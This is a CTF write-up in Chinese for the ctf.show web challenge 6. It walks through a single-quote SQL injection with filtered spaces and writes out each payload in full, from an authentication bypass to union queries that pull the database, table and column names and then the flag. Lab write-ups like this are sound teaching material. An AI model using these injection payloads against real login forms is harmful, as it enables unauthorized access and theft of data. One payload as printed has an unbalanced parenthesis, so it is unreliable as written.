ctfshow-WEB-web6
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过
先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输
a'or(true)#
成功登录
既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用联合注入获取当前使用的数据库,用户名输入以下payload,密码随便输
a'or(true)union(select(1),database(),3)#
当前数据库是web2
接下来获取数据库中的所有表,用户名输入一下payload,密码随便输,如果直接复制payload,记得删掉内容中的空格等特殊字符,尽量使整个内容保持在一行,否则空格或换行符会使结果出错
a'or(true)union(select(1),
(select(group_concat(table_name))from(information_schema.tables)
where(table_schema='web2'))
,3)#
成功获取数据库中的表 flag , user
很明显flag就在flag这个表中,接下来我们获取flag表的所有字段,用户名输入以下payload,密码随便输,如果直接赋值payload,记得删掉内容中的空格和换行符,否则会报错
a'or(true)union(select(1),
select(group_concat(column_name))from(information_schema.columns)
where(table_schema='web2')and(table_name='flag'))
,3)#
成功获取表中字段flag
接下来就是获取flag表中的数据了,用户名输入以下payload,密码随便输
a'or(true)union(select(1),(select(flag)from(flag)),3)#
把整个内容复制到输入框中提交flag,即可过关
ctfshow{4cd84cfd-e43c-40f0-86df-d11bf6c2c50c}
ctfshow-WEB-web6相关推荐
- CTFShow web入门题刷题记录
CTFShow web入门题刷题记录(信息搜集) web1 提示:开发注释未及时删除 打开网页查看源代码发现 flag:flag{2b2cf8e3-f880-41e1-a8ff-02601b3d998 ...
- ctfshow web入门-sql注入
ctfshow web入门-sql注入 web171 web172 web173 web174 web175 web176 web177 web178 web179 web180 web181 web ...
- [ctfshow]web入门——文件上传(web156-web163)
[ctfshow]web入门--文件上传(web156-web163) [ctfshow]web入门--文件上传 [ctfshow]web入门--文件上传(web156-web163) web156 ...
- 无字母数字rce(ctfshow web入门56)
无字母数字rce(ctfshow web入门56) 我们根据这一题直接进入主题 //web56 <?php // 你们在炫技吗? if(isset($_GET['c'])){$c=$_GET[' ...
- [ctfshow web入门]常用姿势801-806
1NDEX 0x00 前言 801 flask pin码计算 谨记!!python 3.8和3.6 pin码生成方式不同 werkzeug版本不同machine-id获取不同 python3.8 pi ...
- ctfshow web入门-XXE
ctfshow web入门-XXE web373 题目描述 解题思路 web374 题目描述 解题思路 web375 题目描述 解题思路 web376 题目描述 解题思路 web377 题目描述 解题 ...
- ctfshow web入门 命令执行 web29~web77 web118~web124
目录 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 web43 web44 w ...
- ctfshow web入门 反序列化 前篇 254-266
这里266后面主要是框架,以后在讲 反序列化入门可以参考我写的另一篇很详细的哦~php 反序列化总结 web254 <?phperror_reporting(0); highlight_file ...
- Ctfshow web入门 爆破系列 21~28
目录 Ctfshow web 21 Ctfshow web 22 Ctfshow web 23 Ctfshow web 24 Ctfshow web 25 Ctfshow web 26 Ctfshow ...
- CTFSHOW WEB 1-100
web入门 给她 1 参考文档 https://blog.csdn.net/weixin_51412071/article/details/124270277 查看链接 sql注入 <?php ...
最新文章
- 新兴短距离无线通信技术ZigBee入门到进阶
- 表单form数据默认以键值对的形式将数据回发到服务器,回发非纯文本需使用enctype=multipart/form-data方式编码为整条消息...
- 【Python学习】 - 超详细的零基础Pandas学习(附Python数据分析与应用课本第四章实训答案)
- LeetCode(463)——岛屿的周长(JavaScript)
- jbod ugood 磁盘驱动状态_NTFS磁盘读写工具Mounty免费版
- 比尔盖茨:十条“金口玉言”-- 世界不会在意你的自尊
- Linux系统和windows系统mysql5.7.32的下载
- Oracle使用技巧及PL/SQL Developer配置
- PHPKafka 1.0 发布,支持全部 50 个 API
- IIS无法启动解决方案
- 经纬度在线查询 地名 批量 查询经纬度 经纬度 批量 查询地名
- Java相关证书,你考过哪个?
- 干货 | 教你打造一款颜值逆天的VS Code
- 细胞衰老——酪氨酸激酶抑制剂
- unity摄像头实物识别_MAD Gaze推出人脸识别AR智能眼镜+AI安防方案赋能智慧城市...
- 计算机与信息学院迎新标语,学院迎新标语横幅
- matlab偏差补偿最小二乘,基于偏差补偿递推最小二乘的Hammerstein-Wiener模型辨识
- hdu校赛—1004
- Theano的安装及GPU的配置
- word中四号字体对应于14pt,其他字号如下
热门文章
- Python通过正则表达式去除(过滤)HTML标签,提取文字
- mysql中使用case when语句
- 软工视频(33~36)-用户界面设计
- C++ 内嵌汇编 实现 加法操作
- 大数据之-Hadoop3.x_MapReduce_数据压缩_案例实现---大数据之hadoop3.x工作笔记0139
- Sharding-JDBC水平分库(水平数据库分片策略配置)_Sharding-Sphere,Sharding-JDBC分布式_分库分表工作笔记010
- SpringCloud工作笔记070---SpringCloud中使用Redis存储List类型数据
- printf(%d,5.01)和printf(%f,5)的输出结果
- win7下看不到摄像头的解决方法
- 动态修改路由_tutorial第二部分-路由参数